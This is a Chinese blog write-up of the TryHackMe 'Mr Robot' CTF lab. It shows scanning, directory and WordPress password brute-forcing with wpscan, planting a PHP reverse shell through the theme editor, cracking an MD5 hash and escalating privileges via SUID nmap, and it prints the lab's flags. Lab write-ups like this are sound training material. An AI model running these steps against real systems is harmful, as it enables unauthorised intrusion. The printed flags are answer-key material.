526互联

THM-Mr Robot CTF靶机通关

发布时间 2023-12-02 00:04:02作者: wplsyx

端口扫描

sudo nmap --min-rate 10000 -p- 10.10.228.164

image.png
开放22,80,443端口
尝试ssh连接:
image.png
被拒绝,只能看http服务了

HTTP

打开页面会加载一段时间动画:
image.png
最后是一个模拟终端的界面,右键查看源代码没有发现什么有效的东西
尝试进行目录爆破

目录爆破

sudo dirsearch -u http://10.10.228.164

image.png
image.pngimage.png
通过爆破发现了后台登录以及robots.txt
http://10.10.228.164/wp-admin.php
http://10.10.228.164/robots.txt
image.png
发现两个文件

fsocity.dic
key-1-of-3.txt

image.png
得到第一个key:073403c8a58a1f80d943455fb30724b9
而另外一个文件,应该是一个字典文件:image.png

后台爆破

尝试用该字典爆破admin,但是好像不行
尝试爆破用户(这里get到了一个新的知识点,在账号与密码都不正确的情况下,爆破用户名返回值也不同)
image.png
猜测用户名为:Elliot
尝试用该字典爆破密码,但是总数太多(又从别的师傅那里get到知识点)
可以先将字典排序并去重:

sort fsocity.dic |uniq > new.dic

使用wpscan爆破密码:

wpscan --url http://10.10.228.164/wp-login.php --usernames Elliot --passwords ./new.dic

登录后台

image.png
尝试能不能反弹shell
image.png
在编辑界面,有一堆php文件,随便找一个弹shell就行

反弹shell

cat /usr/share/webshells/php/php-reverse-shell.php

kali获取反弹shell代码
image.png
设置好端口和IP

curl 10.10.10.10/whoami

获取kali连接VPN后的IP
image.png
同时开启监听:
image.png
成功获取shell

提权

首先用python获取一个交互性好的shell

python -c "import pty; pty.spawn('/bin/bash')"

进入到/home目录下:
image.png
继续进入
image.png
第一个文件权限不够,第二个可以查看
image.png
robot:c3fcd3d76192e4007dfb496cca67e13b
文件后缀为md5,尝试md5解密
image.png
成功解密:abcdefghijklmnopqrstuvwxyz
尝试登录robot用户
image.png
成功登录,查看key-2-of-3.txt
image.png
成功获得第二个key822c73956184f694993bede3eb39f959
接下来就不是很会了(继续借鉴)

find / -type f -perm -04000 -ls 2>/dev/null

使用suid提权
image.png
根据提示,看到了nmap
https://gtfobins.github.io/ 访问并查看nmap提权:

nmap --interactive
!sh

image.png
提权成功
获取第三个key
image.png
04787ddef27c3dee1ee161b21670b4e4

总结

【THM】Mr Robot CTF-练习 - Hekeatsl - 博客园
借鉴了该师傅的东西,通过打这个靶机也学到了不少思路,感谢师傅!